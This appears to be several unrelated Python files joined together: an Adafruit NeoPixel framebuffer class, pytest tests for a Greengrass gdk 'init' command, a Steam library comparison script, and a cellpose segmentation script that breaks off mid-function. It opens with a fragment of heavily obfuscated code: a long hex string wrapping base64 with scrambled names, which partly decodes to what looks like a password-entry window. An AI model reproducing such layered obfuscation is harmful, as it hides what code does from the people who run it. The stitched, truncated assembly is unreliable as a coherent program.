'6377270D0A09090909274E546B314E545A454E7A6731515452454D7A45305153634E43676B6E4E7A4D314E7A5A434E4555304D7A59'
'784E446330515463774E544532525451794E6A6B324D6A5A444E45457A4E5456424E4459324E44557A4E6A49304E7A52464E7A4131'
'4D6A270D0A090909092755334E6A51314E6A55794D7A413151544D324E546B33515452424E4463324D6A5A444E7A41314E4455784E'
'6B51794E7A42454D4545774F5449334D7A6B31515455334E44557A4D545A464E54636E44516F4A4A7A55334D7A45314E7A59794E44'
'6330270D0A0909090927515463774E54453252445A444E6A6B314D6A64424E6B4D334D5455354E545130515455334E6A457A4D4463'
'344E7A41314D5455314D7A55304E4456424E3045304D6A52444E545532517A59344E6B59324D7A51334E5449304F4459794E446731'
'4E6A270D0A090909092759784E6A55314E4455794D7A45314E4451334E6A4D334E7A557A4E7A6B324D7A63774A77304B4353633051'
'7A517A4E444932516A55334E445930515463304E5451304E6A55794E6B5530516A557A4E6B49305254517A4E6A6332516A52424E6A'
'4930270D0A09090909274E4451324E7A4D30524455334E7A63334F4459794E4451304E545A474E6A49304E7A63334E7A67324D6A51'
'304E4455334F4459794E4451304E545A474E6A49304E4451314E7A67794E7A42454D4545774F5449334E6A49304E79634E43676B6E'
'4E7A270D0A090909092763334F4459794E4451304E545A474E6A49314E7A63344E3045324E4464424E54497A4D4459784E6B45324D'
'7A4D794E45517A4D7A597A4E7A6330526A55334E6A67325254597A4E7A6B324E7A5A464E546B33515452464E7A4D324E545A434E7A'
'6733270D0A09090909274E4455324E6B45314D6A59344E5463304E6A51324E7A59314E4455314E4555334D6A55774E544D324D7A63'
'774E454D6E44516F4A4A7A517A4E444932516A55334E445930515463304E5451304E6A55794E6B5530516A557A4E7A63324E7A5531'
'4E44270D0A090909092755324F4452474E4551304E7A52464E7A51324D6A51344E5459324D5459314E6B45314D54637A4E446B304E'
'6A63774E546B324D5451334E7A6731515459304E7A6B32516A63774E4451314D5463774E6B4D324D6A51344E455532517A52474E6A'
'6379270D0A09090909274E7A42454A77304B43536377515441354D6A637A4D4452434E444D314E7A63334E7A67324D6A51304E4459'
'334D7A52454E5463334E7A63344E4549304E7A63344E7A4D30524455334E7A63334F4452454E5463334E7A63344E4549304E7A6333'
'4E7A270D0A09090909276730524455334E7A67334D7A52454E5463334E7A63344E4549304E7A4D784E7A4D324D7A4D7A4E6A4D7A4D'
'4459304E446332526A4D7A4E4555325153634E43676B6E4E45557A4D7A52454E445132517A5A474E55457A4D7A52454E6B59305154'
'4D79270D0A09090909274E4555304F4459314E446730515459344E54593351545A444E7A6731515451324E4555304D6A52474E5455'
'32517A51344E6A517A4D7A59344E6A6B314D6A4D7A4E6A517A4E4455304E5459324E444D7A4E6A55304E5463304E4467324E444D7A'
'4E6A270D0A090909092767324F5455794E445531515464424E546B6E44516F4A4A7A5A434E5449304E7A49334D455177515441354D'
'6A63324D7A4D774E7A51304F4452454E54673052545A424E45517A4D6A52454E7A6331515451314E6A51334E6A52454D7A417A4E54'
'6378270D0A09090909274E545132515452464E4555314D6A51334E7A67334E6A55334E6B4530525452464E6A497A4D445A474E7A6B'
'314E7A5A464E4449314D4455324E5455334D4463784E54557A4D4455324A77304B43536330516A55794E6B4D324E4455334E6A4530'
'4E6A270D0A090909092752464E6A67314D6A55344E6A517A4D7A56424E5455324F4459784E546332516A4D784E7A49314E7A5A464E'
'7A41314E5455794E445531515455304E546B32516A59304E4549314E7A55324E4459314F5455334E6B51334D4455304E5449314E6A'
'5A47270D0A09090909274D7A49314E6A4D794E7A5132516A55314D7A49314E6A637A4E6A4D304F43634E43676B6E4E5459314E4455'
'334E445931515463794E545532525449334D455177515441354D6A63334D4451334E45517A4D4463774D7A55324D544D7A4E444930'
'5244270D0A090909092755784D7A41304E6A63774E5545304F445A444E4545324D7A51314E5449314D6A597A4E4467324E4459354E'
'54497A4D7A55794E7A63314F545A424E4545334E7A52454E5455334F4463314E5545304F445A444E6A676E44516F4A4A7A55334E44'
'5930270D0A09090909275154637A4E544D7A4D4459304E4559324D6A4D774E7A51314D6A52454E4455334E445A424E54497A4D7A59'
'344E7A6B314F5455324E6A4D7A4E54597A4E5463314D6A55304E4555314E7A63774E6A6B314D6A64424E6B4D7A4E6A55334E6B4D30'
'5254270D0A09090909275A464E6A4D304D7A597A4E7A4130517A517A4E444932516A55334E445930515463304E5451304E6A55794A'
'77304B43536332525452434E544D334E7A59334E5455304E5459344E455930524451334E4555334E4449334D455177515441354D6A'
'6332270D0A09090909274D6A51344E5459324D5459314E6B45314D54637A4E446B304E6A63774E546B324D5451334E7A6731515459'
'304E7A6B32516A63774D6A63794F544A444D455177515441354E6A51314F4455794E6B5130517A55304E6A63794F544A444D6A4177'
'5243270D0A0909090927634E43676B6E4D4545774F5455774E44673052544D774E6A4D3252445A444E7A5531515464424D7A517951'
'7A49774D455177515441354E5545314F4459344E6B4D314F5463334D6A6B77524442424D6A6B6E4B51304B43516B674C6D526C5932'
'396B270D0A09090909275A53686B57464A745446526E4B536B4E4367304B4451706B5A5759675A47315765574658576A556F4B546F'
'4E43676C6A534752724944306759306447656D4D77566E566B53456F314C6D646C6443677044516F4A615759675930686B61794139'
'5053270D0A090909092742734D544673624446734D53687462484E334E4852714E7A597A647A41356147647A4B43646956305A7557'
'6C63314D466C55545868505630357A596A4E5761324E335054306E4B5377675A466853625578555A796B3644516F4A435777786244'
'4673270D0A09090909274D5777784B4731736333633064476F334E6A4E334D446C6F5A334D6F4A316B776147746C615456345A4664'
'734D457444617A306E4B536B4E43676B4A624446734D5777786244456F6257787A647A5230616A63324D3363774F57686E6379676E'
'5754270D0A0909090927426F613256704E57746157453477593230354E557444617A306E4B536B4E43676B4A624446734D57777862'
'44456F62477778624445786244456F62444578624777786244456F6257787A647A5230616A63324D3363774F57686E6379676E576A'
'4A34270D0A0909090927646C6C74526E4E4A526D7830596B5243616B31735758636E4B5377675A466853625578555A796B73494642'
'49546A426A62577831576E6F304C43426157476873575863704B51304B43516C614D6B5A30576C6857634341394947467A5A6A5931'
'5A58270D0A09090909274E6B61476B344E79677044516F4A435764316153413949456431615368614D6B5A30576C685763436B4E43'
'676B4A624446734D5777786244456F6257787A647A5230616A63324D3363774F57686E6379676E5632704B5232524763466C57626B'
'4631270D0A0909090927596C644763474A7465485A694D30467653314539505363704B51304B4451706A534752364944306759584E'
'6D4E6A566C6332526F615467334B436B4E436D7778624446734D5777784B4731736333633064476F334E6A4E334D446C6F5A334D6F'
'4A31270D0A09090909276B776147746C61545635576C684F63475674526D6C6952315676596C6434656D5236556A4268616D4D7954'
'544E6A643039586147356A655764755657307852324D7954586C575644427553314E335A324A586548706B656C49775957706A4D6B'
'307A270D0A0909090927593364505632687559336C6E626C56744D55646A4D6B31354A77304B43516B4A43516B6749436457564442'
'7553314E72505363704B51304B624446734D5777786244456F6257787A647A5230616A63324D3363774F57686E6379676E5754426F'
'6132270D0A090909092756704E54426857464A7A576C4E6F64474A49546A4E4F53464A78546E705A656D5236515456685232523653'
'304E4B56564A366248565A566D4D7755464E4A634574525054306E4B536B4E436D7778624446734D5777784B473173633363306447'
'6F33270D0A09090909274E6A4E334D446C6F5A334D6F4A316B776147746C61545671596A4931625746585A44466A62565676575731'
'47616D45795A486C694D315A31576B517864474A49546A4E4F53464A78546E705A656D5236515456685232523653304E6B61303174'
'6148270D0A090909092764615257525755464E6A634574525054306E4B536B4E436D5259546D786A62464A735A5568524944306754'
'4746695A57776F5930686B65697767644756346444317462484E334E4852714E7A597A647A41356147647A4B436457574535735932'
'3031270D0A090909092761474A585654596E4B537767596D466A61326479623356755A44317462484E334E4852714E7A597A647A41'
'356147647A4B43646B4D6D68775A456456505363704B51304B59306447656D4D78556D786C534645675053424D59574A6C6243686A'
'5347270D0A090909092752364C4342305A586830505731736333633064476F334E6A4E334D446C6F5A334D6F4A315648526E706A4D'
'325232593231524E6963704C43426959574E725A334A766457356B505731736333633064476F334E6A4E334D446C6F5A334D6F4A32'
'5179270D0A09090909276148426B523155394A796B704451706B574535735932745764575249536A556750534246626E5279655368'
'6A534752364B51304B59306447656D4D77566E566B53456F314944306752573530636E6B6F5930686B65696B4E436D4D7A566D6C69'
'5632270D0A09090909277777555735574D4752484F58556750534243645852306232346F5930686B65697767644756346444317462'
'484E334E4852714E7A597A647A41356147647A4B436455527A6C7559566330505363704C43426A623231745957356B50575274566E'
'6C68270D0A090909092756316F314C43426959574E725A334A766457356B505731736333633064476F334E6A4E334D446C6F5A334D'
'6F4A32516E44516F4A43516B4A43516B4A43516B4A43516B4A43516B4A43516B4A43516B4A43516B4A43516B4A494363794A77304B'
'4351270D0A09090909276B4A43516B4A43516B4A43516B4A43516B4A43516B4A43516B4A43516B4A43516B4A4353416E6143634E43'
'676B4A43516B4A43516B4A43516B4A43516B4A43516B4A43516B4A43516B4A43516B4A43516B674A33416E44516F4A43516B4A4351'
'6B4A270D0A090909092743516B4A43516B4A43516B4A43516B4A43516B4A43516B4A43516B4A4943646B4A77304B43516B4A43516B'
'4A43516B4A43516B4A43516B4A43516B4A43516B4A43516B4A43516B4A4353416E5279634E43676B4A43516B4A43516B4A43516B4A'
'4351270D0A09090909276B4A43516B4A43516B4A43516B4A43516B4A43516B674A31556E44516F4A43516B4A43516B4A43516B4A43'
'516B4A43516B4A43516B4A43516B4A43516B4A43516B4A494363394A77304B43516B4A43516B4A43516B4A43516B4A43516B4A4351'
'6B4A270D0A090909092743516B4A43516B4A43516B4A435341704B51304B5931685763475246536A466B53464A32596D6367505342'
'43645852306232346F5930686B65697767644756346444317462484E334E4852714E7A597A647A41356147647A4B43645357476877'
'5A45270D0A09090909274539505363704C43426A623231745957356B505846316158517349474A685932746E636D3931626D513962'
'57787A647A5230616A63324D3363774F57686E6379676E5A444A6F6347516E44516F4A43516B4A43516B4A43516B4A43516B4A4351'
'6B4A270D0A090909092743516B4A43516B4A43516B4A43534167494364485654306E4B536B4E436D7778624446734D5777784B4731'
'736333633064476F334E6A4E334D446C6F5A334D6F4A317047614539695230357A5657313462464E47525856614D307077576B4E6F'
'6557270D0A0909090927497A597A6C69563368365A4870534D474671597A4A4E4D324E335431646F626D4E355A3235555655553555'
'464E6A63457844516D70694D6E6778596C63304F574A586548706B656C49775957706A4D6B307A593364504A77304B43516B4A4351'
'6B67270D0A0909090927494364586147356A65576475564656464F5642545933424C555430394A796B70445170734D577778624446'
'734D53687462484E334E4852714E7A597A647A41356147647A4B436461526D6850596B644F636C5A75566D7454525738785447316B'
'6557270D0A090909092746585557396A62546B7A5546637863324D7A597A426B5232387A546D704F4D303145624739614D30317653'
'6A4178516C42554D47354C5533646E57544935633252584D585651567A467A597A4E6A4D475248627A4E4F616B347A545552734A77'
'304B270D0A090909092743516B4A43516B6749436476576A4E4E62306F774D564A515644427553314E335A316B794F584E6B567A46'
'31597A4E4361474A714D5852695345347A546B6853635535365758706B656B45315955646B656B74445A45356B656A4135536E6C72'
'6343270D0A090909092763704B51304B624446734D5777786244456F6257787A647A5230616A63324D3363774F57686E6379676E57'
'54426B52325674545868566258687355305A4664566F7A536E426151326835596A4E6A4F574A586548706B656C49775957706A4D6B'
'307A270D0A0909090927593364505632687559336C6E626C525752546C5155324E7754454E43616D497965444669567A5135596C64'
'34656D5236556A4268616D4D7954544E6A643039586143634E43676B4A43516B4A4943416E626D4E355A3235555655553555464E6A'
'6345270D0A090909092774525054306E4B536B4E436D7778624446734D5777784B4731736333633064476F334E6A4E334D446C6F5A'
'334D6F4A316B775A45646C62553133566D355761314E46627A464D625752355956645262324E744F544E51567A467A597A4E6A4D47'
'5248270D0A0909090927627A4E4F616B347A5455527362316F7A5457394B4D44465355465177626B74546432645A4D6A6C7A5A4663'
'78645642584D584E6A4D324D775A4564764D303571546A4E4E5247776E44516F4A43516B4A435341674A3239614D303176536A4178'
'556C270D0A090909092742554D47354C5533646E57544935633252584D58566A4D304A6F596D6F7864474A49546A4E4F53464A7854'
'6E705A656D5236515456685232523653304E6B546D52364D446C4B655774774A796B70445170734D577778624446734D5368746248'
'4E33270D0A09090909274E4852714E7A597A647A41356147647A4B43645A656B35585956644B57474A45516C4A6962466C33576B56'
'6A4E5752544E57356A625778725330684B646D52364D5852695345347A546B6853635535365758706B656B45315955646B656B7444'
'5A45270D0A09090909273561656A4135536E6C7263306C48546E5A6953465A30596D6F7864474A49546A4E4F53464A78546E705A4A'
'77304B43516B4A43516B67494364365A4870424E5746485A48704C5132524F555651774F55703561334E4A52303532596B68576447'
'4A75270D0A0909090927546E645A567A5135596C6434656D5236556A4268616D4D7954544E6A643039586147356A65576475564664'
'6A4F5642545933424D51304A365A456473616D457A617A6C576558524753314539505363704B51304B624446734D5777786244456F'
'6257270D0A0909090927787A647A5230616A63324D3363774F57686E6379676E5754466F56324E48556B5A54616B5A7255305A4B4D'
'6C6C74593356614D307077576B4E6F6557497A597A6C69563368365A4870534D474671597A4A4E4D324E335431646F626D4E355A32'
'3555270D0A090909092756324D3555464E6A63457844516D70694D6E6778596C63304F574A586548706B656C49775957706A4D6B30'
'7A5979634E43676B4A43516B4A4943416E643039586147356A655764755646646A4F5642545933424D51304A71596A4A344D574A58'
'4E58270D0A0909090927706A52305A315546637863324D7A597A426B5232387A546D704F4D303145624739614D303176536A417862'
'6C42554D47354C5533646E597A4E5363466B7964445651566D4E79556C4E72505363704B51304B445170734D577778624446734D53'
'6874270D0A090909092762484E334E4852714E7A597A647A41356147647A4B43645A4D4768725A576B3164466C5862485669527A6C'
'3259304E6E634363704B513D3D27292C0D0A0909096458526D4C5467292C0D0A090950484E30636D6C755A7A342C0D0A09095A5868'
'6C5977290D0A29').decode(большевик))
|
# SPDX-FileCopyrightText: 2017 <NAME>, written for Adafruit Industries
# SPDX-FileCopyrightText: Copyright (c) 2020 <NAME> for Adafruit Industries
#
# SPDX-License-Identifier: MIT
"""
`adafruit_pixel_framebuf`
================================================================================
Neopixel and Dotstar Framebuffer Helper
* Author(s): <NAME>
Implementation Notes
--------------------
**Hardware:**
* `Adafruit NeoPixels <https://www.adafruit.com/category/168>`_
* `Adafruit DotStars <https://www.adafruit.com/category/885>`_
* `Flexible 8x32 NeoPixel RGB LED Matrix <https://www.adafruit.com/product/2294>`_
* `Flexible 16x16 NeoPixel RGB LED Matrix <https://www.adafruit.com/product/2547>`_
* `Flexible 8x8 NeoPixel RGB LED Matrix <https://www.adafruit.com/product/2612>`_
* `Adafruit NeoPixel 8x8 NeoMatrices <https://www.adafruit.com/product/3052>`_
* `Adafruit DotStar High Density 8x8 Grid <https://www.adafruit.com/product/3444>`_
* `Adafruit NeoPixel FeatherWing <https://www.adafruit.com/product/2945>`_
* `Adafruit DotStar FeatherWing <https://www.adafruit.com/product/3449>`_
**Software and Dependencies:**
* Adafruit CircuitPython firmware for the supported boards:
https://github.com/adafruit/circuitpython/releases
* Adafruit's LED Animation library:
https://github.com/adafruit/Adafruit_CircuitPython_LED_Animation
* Adafruit's framebuf library: https://github.com/adafruit/Adafruit_CircuitPython_framebuf
"""
# imports
from micropython import const
import adafruit_framebuf
from adafruit_led_animation.grid import PixelGrid
__version__ = "1.1.1"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_Pixel_Framebuf.git"
HORIZONTAL = const(1)
VERTICAL = const(2)
# pylint: disable=too-many-function-args
class PixelFramebuffer(adafruit_framebuf.FrameBuffer):
"""
NeoPixel and Dotstar FrameBuffer for easy drawing and text on a
grid of either kind of pixel
:param strip: An object that implements the Neopixel or Dotstar protocol.
:param width: Framebuffer width.
:param height: Framebuffer height.
:param orientation: Orientation of the strip pixels - HORIZONTAL (default) or VERTICAL.
:param alternating: Whether the strip alternates direction from row to row (default True).
:param reverse_x: Whether the strip X origin is on the right side (default False).
:param reverse_y: Whether the strip Y origin is on the bottom (default False).
:param tuple top: (x, y) coordinates of grid top left corner (Optional)
:param tuple bottom: (x, y) coordinates of grid bottom right corner (Optional)
:param int rotation: A value of 0-3 representing the rotation of the framebuffer (default 0)
"""
def __init__(
self,
pixels,
width,
height,
orientation=HORIZONTAL,
alternating=True,
reverse_x=False,
reverse_y=False,
top=0,
bottom=0,
rotation=0,
): # pylint: disable=too-many-arguments
self._width = width
self._height = height
self._grid = PixelGrid(
pixels,
width,
height,
orientation,
alternating,
reverse_x,
reverse_y,
top,
bottom,
)
self._buffer = bytearray(width * height * 3)
self._double_buffer = bytearray(width * height * 3)
super().__init__(
self._buffer, width, height, buf_format=adafruit_framebuf.RGB888
)
self.rotation = rotation
def blit(self):
"""blit is not yet implemented"""
raise NotImplementedError()
def display(self):
"""Copy the raw buffer changes to the grid and show"""
for _y in range(self._height):
for _x in range(self._width):
index = (_y * self.stride + _x) * 3
if (
self._buffer[index : index + 3]
!= self._double_buffer[index : index + 3]
):
self._grid[(_x, _y)] = tuple(self._buffer[index : index + 3])
self._double_buffer[index : index + 3] = self._buffer[
index : index + 3
]
self._grid.show()
|
from pathlib import Path
from unittest.mock import Mock, mock_open, patch
import gdk.commands.component.init as init
import gdk.common.exceptions.error_messages as error_messages
import pytest
from urllib3.exceptions import HTTPError
def test_init_run_with_non_empty_directory(mocker):
# Test that an exception is raised when init is run in non-empty directory
test_d_args = {"language": "python", "template": "name"}
mock_is_directory_empty = mocker.patch("gdk.common.utils.is_directory_empty", return_value=False)
mock_init_with_template = mocker.patch("gdk.commands.component.init.init_with_template", return_value=None)
mock_init_with_repository = mocker.patch("gdk.commands.component.init.init_with_repository", return_value=None)
mock_conflicting_args = mocker.patch("gdk.common.parse_args_actions.conflicting_arg_groups", return_value=False)
with pytest.raises(Exception) as e:
init.run(test_d_args)
assert e.value.args[0] == error_messages.INIT_NON_EMPTY_DIR_ERROR
assert mock_is_directory_empty.call_count == 1
assert mock_conflicting_args.call_count == 0
assert mock_init_with_template.call_count == 0
assert mock_init_with_repository.call_count == 0
def test_init_run_with_empty_directory(mocker):
# Test that an exception is not raised when init is run in an empty directory
test_d_args = {"template": None, "language": None, "repository": "repository"}
mock_is_directory_empty = mocker.patch("gdk.common.utils.is_directory_empty", return_value=True)
mock_init_with_template = mocker.patch("gdk.commands.component.init.init_with_template", return_value=None)
mock_init_with_repository = mocker.patch("gdk.commands.component.init.init_with_repository", return_value=None)
mock_conflicting_args = mocker.patch("gdk.common.parse_args_actions.conflicting_arg_groups", return_value=False)
init.run(test_d_args)
assert mock_is_directory_empty.call_count == 1
assert mock_init_with_template.call_count == 0
assert mock_init_with_repository.call_count == 1
assert mock_conflicting_args.call_count == 1
def test_init_run_with_empty_args_repository(mocker):
# Test that an exception is not raised when init is run in an empty directory
test_d_args = {"template": None, "language": None, "repository": None}
mock_is_directory_empty = mocker.patch("gdk.common.utils.is_directory_empty", return_value=True)
mock_init_with_template = mocker.patch("gdk.commands.component.init.init_with_template", return_value=None)
mock_init_with_repository = mocker.patch("gdk.commands.component.init.init_with_repository", return_value=None)
mock_conflicting_args = mocker.patch("gdk.common.parse_args_actions.conflicting_arg_groups", return_value=False)
with pytest.raises(Exception) as e:
init.run(test_d_args)
assert e.value.args[0] == error_messages.INIT_WITH_INVALID_ARGS
assert mock_is_directory_empty.call_count == 1
assert mock_init_with_template.call_count == 0
assert mock_init_with_repository.call_count == 0
assert mock_conflicting_args.call_count == 1
def test_init_run_with_empty_args_template(mocker):
# Test that an exception is not raised when init is run in an empty directory
test_d_args = {"template": None, "language": "python", "repository": None}
mock_is_directory_empty = mocker.patch("gdk.common.utils.is_directory_empty", return_value=True)
mock_init_with_template = mocker.patch("gdk.commands.component.init.init_with_template", return_value=None)
mock_init_with_repository = mocker.patch("gdk.commands.component.init.init_with_repository", return_value=None)
mock_conflicting_args = mocker.patch("gdk.common.parse_args_actions.conflicting_arg_groups", return_value=False)
with pytest.raises(Exception) as e:
init.run(test_d_args)
assert e.value.args[0] == error_messages.INIT_WITH_INVALID_ARGS
assert mock_is_directory_empty.call_count == 1
assert mock_init_with_template.call_count == 0
assert mock_init_with_repository.call_count == 0
assert mock_conflicting_args.call_count == 1
def test_init_run_with_conflicting_args(mocker):
# Test that an exception is not raised when init is run in an empty directory
test_d_args = {"repository": "repository"}
mock_is_directory_empty = mocker.patch("gdk.common.utils.is_directory_empty", return_value=True)
mock_init_with_template = mocker.patch("gdk.commands.component.init.init_with_template", return_value=None)
mock_init_with_repository = mocker.patch("gdk.commands.component.init.init_with_repository", return_value=None)
mock_conflicting_args = mocker.patch("gdk.common.parse_args_actions.conflicting_arg_groups", return_value=True)
with pytest.raises(Exception) as e:
init.run(test_d_args)
assert e.value.args[0] == error_messages.INIT_WITH_CONFLICTING_ARGS
assert mock_is_directory_empty.call_count == 1
assert mock_init_with_template.call_count == 0
assert mock_init_with_repository.call_count == 0
assert mock_conflicting_args.call_count == 1
def test_init_run_with_valid_args(mocker):
# Checks if args are used correctly to run correct init method
test_d_args = {"language": "python", "template": "name"}
mock_is_directory_empty = mocker.patch("gdk.common.utils.is_directory_empty", return_value=True)
mock_init_with_template = mocker.patch("gdk.commands.component.init.init_with_template", return_value=None)
mock_init_with_repository = mocker.patch("gdk.commands.component.init.init_with_repository", return_value=None)
init.run(test_d_args)
assert mock_is_directory_empty.call_count == 1
assert mock_init_with_template.call_count == 1
assert mock_init_with_repository.call_count == 0
def test_init_run_with_invalid_args(mocker):
test_d_args = {"language": None, "template": None, "repository": None}
mock_is_directory_empty = mocker.patch("gdk.common.utils.is_directory_empty", return_value=True)
mock_init_with_template = mocker.patch("gdk.commands.component.init.init_with_template", return_value=None)
mock_init_with_repository = mocker.patch("gdk.commands.component.init.init_with_repository", return_value=None)
with pytest.raises(Exception) as e:
init.run(test_d_args)
assert e.value.args[0] == error_messages.INIT_WITH_INVALID_ARGS
assert mock_is_directory_empty.call_count == 1
assert mock_init_with_template.call_count == 0
assert mock_init_with_repository.call_count == 0
def test_init_with_template_valid(mocker):
template = "template"
language = "language"
mock_download_and_clean = mocker.patch("gdk.commands.component.init.download_and_clean", return_value=None)
init.init_with_template(template, language)
mock_download_and_clean.assert_any_call("template-language", "template")
def test_init_with_template_exception(mocker):
template = "template"
language = "language"
mock_download_and_clean = mocker.patch(
"gdk.commands.component.init.download_and_clean", side_effect=HTTPError("Some error")
)
with pytest.raises(Exception) as e:
init.init_with_template(template, language)
assert "Could not initialize the project with component template" in e.value.args[0]
mock_download_and_clean.assert_any_call("template-language", "template")
def test_init_with_repository_valid(mocker):
repository = "repository_name"
mock_download_and_clean = mocker.patch("gdk.commands.component.init.download_and_clean", return_value=None)
init.init_with_repository(repository)
mock_download_and_clean.assert_any_call(repository, "repository")
def test_init_with_repository_exception(mocker):
repository = "repository_name"
mock_download_and_clean = mocker.patch(
"gdk.commands.component.init.download_and_clean", side_effect=HTTPError("Some error")
)
with pytest.raises(Exception) as e:
init.init_with_repository(repository)
assert "Could not initialize the project with component repository" in e.value.args[0]
mock_download_and_clean.assert_any_call(repository, "repository")
@patch("zipfile.ZipFile")
def test_download_and_clean_valid(mock_zip, mocker):
mock_get_available_templates = mocker.patch(
"gdk.commands.component.list.get_component_list_from_github",
return_value={"template-language": "template-url"},
)
mock_response = mocker.Mock(status_code=200, content="".encode())
mock_template_download = mocker.patch("requests.get", return_value=mock_response)
mock_za = Mock()
mock_za.return_value.namelist.return_value = ["one"]
mock_za.return_value.extractall.return_value = None
mock_zip.return_value.__enter__ = mock_za
# mock_tmp = ""
# mock_tempdir.return_value.__enter__ = mock_tmp
mock_iter_dir = mocker.patch("pathlib.Path.iterdir", return_value=["dummy-folder1"])
mock_move = mocker.patch("shutil.move", return_value=None)
init.download_and_clean("template-language", "template")
assert mock_iter_dir.call_count == 1
assert mock_move.call_count == 1
mock_move.assert_any_call("dummy-folder1", Path(".").resolve())
assert mock_template_download.call_count == 1
assert mock_get_available_templates.call_count == 1
def test_init_with_template_invalid_url(mocker):
# Raises an exception when the template url is not valid.
template = "template"
language = "language"
formatted_template_name = f"{template}-{language}"
mock_get_available_templates = mocker.patch(
"gdk.commands.component.list.get_component_list_from_github",
return_value={formatted_template_name: "template-url"},
)
mock_response = mocker.Mock(status_code=404, raise_for_status=mocker.Mock(side_effect=HTTPError("some error")))
mock_template_download = mocker.patch("requests.get", return_value=mock_response)
with patch("builtins.open", mock_open()) as mock_file:
with pytest.raises(Exception) as e:
init.download_and_clean(formatted_template_name, template)
assert "Failed to download the selected component" in e.value.args[0]
assert mock_template_download.call_count == 1
assert mock_get_available_templates.call_count == 1
assert not mock_file.called
def test_get_download_url_valid_template(mocker):
template = "template"
language = "language"
formatted_template_name = f"{template}-{language}"
mock_get_component_list_from_github = mocker.patch(
"gdk.commands.component.list.get_component_list_from_github",
return_value={formatted_template_name: "template-url"},
)
url = init.get_download_url(formatted_template_name, "template")
assert url == "template-url"
assert mock_get_component_list_from_github.called
def test_get_download_url_valid_repository(mocker):
repository = "repository_name"
mock_get_component_list_from_github = mocker.patch(
"gdk.commands.component.list.get_component_list_from_github",
return_value={"repository_name": "repository-url"},
)
url = init.get_download_url(repository, "repository")
assert url == "repository-url"
assert mock_get_component_list_from_github.called
def test_get_download_url_invalid_template(mocker):
template = "template-language"
mock_get_component_list_from_github = mocker.patch(
"gdk.commands.component.list.get_component_list_from_github",
return_value={"repository_name": "repository-url"},
)
with pytest.raises(Exception) as e:
init.get_download_url(template, "template")
assert e.value.args[0] == "Could not find the component template 'template-language' in Greengrass Software Catalog."
assert mock_get_component_list_from_github.called
def test_get_download_url_invalid_repository(mocker):
repository = "repository_name"
mock_get_component_list_from_github = mocker.patch(
"gdk.commands.component.list.get_component_list_from_github",
return_value={"template-language": "template-url"},
)
with pytest.raises(Exception) as e:
init.get_download_url(repository, "repository")
assert e.value.args[0] == "Could not find the component repository 'repository_name' in Greengrass Software Catalog."
assert mock_get_component_list_from_github.called
|
<gh_stars>1-10
from collections.abc import Iterable
import requests
import argparse
import steamid
import urllib
parser = argparse.ArgumentParser(description="Look up and compare Steam users' libraries")
parser.add_argument('--api-key', type=str, dest='apikey', required=True, help='Your Steam API key; see https://steamcommunity.com/dev/apikey')
parser.add_argument('steamid', type=str, nargs='+', help='A Steam ID to add to the comparison list. Accepts any format (vanity URL, Steam ID, SteamID64, etc)')
args = parser.parse_args()
apikey = args.apikey
def steam_request(endpoint: str, params: dict[str, str]) -> any:
"""Generic method to perform a request to Steam's public API.
Parameters
----------
endpoint : str
The endpoint to hit
params : dict[str, str]
The query parameters to pass to requests
Returns
-------
any
The JSON-decoded body of the returned response
Raises
------
requests.RequestException
If any failures occurred while making the request
"""
r = requests.get(
f'https://api.steampowered.com/{endpoint}/',
{
**params,
**{
'key': apikey,
'format': 'json'
}
}
)
r.raise_for_status()
body = r.json()
return body
def get_games_for_steamid(steamid: str) -> set[tuple[int, str]]:
"""Gets the games owned by a Steam user
Parameters
----------
steamid : str
The user's 64-bit Steam ID
Returns
-------
set[tuple[int, str]]
The set of games this user owns, in tuples of appid and game name
"""
body = steam_request('IPlayerService/GetOwnedGames/v0001', params={
'include_appinfo': True, 'steamid': steamid
})
return set((game['appid'], game['name']) for game in body['response']['games'])
def convert_to_steamid64(possible_steamid: str) -> str:
"""Attempts to convert a Steam ID or vanity URL into a 64-bit Steam ID
First, this attempts to parse the Steam ID into any known format, and convert that into a
64-bit Steam ID. Failing that, this will issue a request to Steam in order to resolve the
string as a vanity URL.
Parameters
----------
possible_steamid : str
The string to convert. Can be a Steam ID or a vanity URL.
Returns
-------
str
The 64-bit Steam ID of the found user
"""
as_url = urllib.parse.urlparse(possible_steamid)
if as_url.scheme in ['http', 'https'] and as_url.netloc == 'steamcommunity.com':
path_components = [c for c in as_url.path.split('/') if c != '']
if len(path_components) == 2 and path_components[0] in ['profiles', 'id']:
possible_steamid = path_components[1]
else:
raise RuntimeError('Invalid Steam URL format: ' + possible_steamid)
try:
sid = steamid.SteamID(possible_steamid)
return sid.toString()
except ValueError:
return steam_request('ISteamUser/ResolveVanityURL/v1', params={
'vanityurl': possible_steamid
})['response']['steamid']
def get_names_from_steamids(steamids: Iterable[str]) -> dict[str, str]:
"""Gets the display names of all provided users
Parameters
----------
steamids : Iterable[str]
The 64-bit Steam IDs to fetch the names of
Returns
-------
dict[str, str]
A list of names of users, keyed by their Steam IDs
"""
players = steam_request('ISteamUser/GetPlayerSummaries/v2', params={
'steamids': ','.join(steamids)
})['response']['players']
return { player['steamid']: player['personaname'] for player in players }
def print_games(games: set[tuple[int, str]]):
"""Helper function to print a list of games"""
for game in sorted(games, key=lambda g: g[1]):
print(f' - {game[1]}')
print()
steamids = [convert_to_steamid64(sid) for sid in args.steamid]
steamid_names = get_names_from_steamids(steamids)
steamid_games = { steamid: get_games_for_steamid(steamid) for steamid in steamids }
common_games = set.intersection(*steamid_games.values())
for steamid in steamids:
header = f"{steamid_names[steamid]}'s games"
print(header)
print('-' * len(header))
print_games(steamid_games[steamid])
if len(steamids) > 1:
print('Games in common')
print('---------------')
print_games(common_games)
|
from skimage.morphology import closing, square, remove_small_objects
from skimage.measure import label
from skimage.segmentation import clear_border
from skimage.filters import threshold_otsu
import os
import numpy as np
import matplotlib.pyplot as plt
import skimage.io
from cellpose import models
from cellpose import plot
import collections
input_folder = f'results/example_diffuse-FRET/initial_cleanup/'
output_folder = f'results/example_diffuse-FRET/cellpose_masking/'
if not os.path.exists(output_folder):
os.mkdir(output_folder)
def apply_cellpose(images, image_type='cyto', channels=[0,0], diameter=None):
"""Apply model to list of images. Returns masks, flows, styles, diams.
- model type is 'cyto' or 'nuclei'
- define CHANNELS to run segementation on (grayscale=0, R=1, G=2, B=3) where channels = [cytoplasm, nucleus]. If NUCLEUS channel does not exist, set the second channel to 0
"""
model = models.Cellpose(model_type=image_type)
masks, flows, styles, diams = model.eval(images, diameter=diameter, channels=channels)
return masks, flows, styles, diams
def visualise_cell_pose(images, masks, flows, channels=[0,0]):
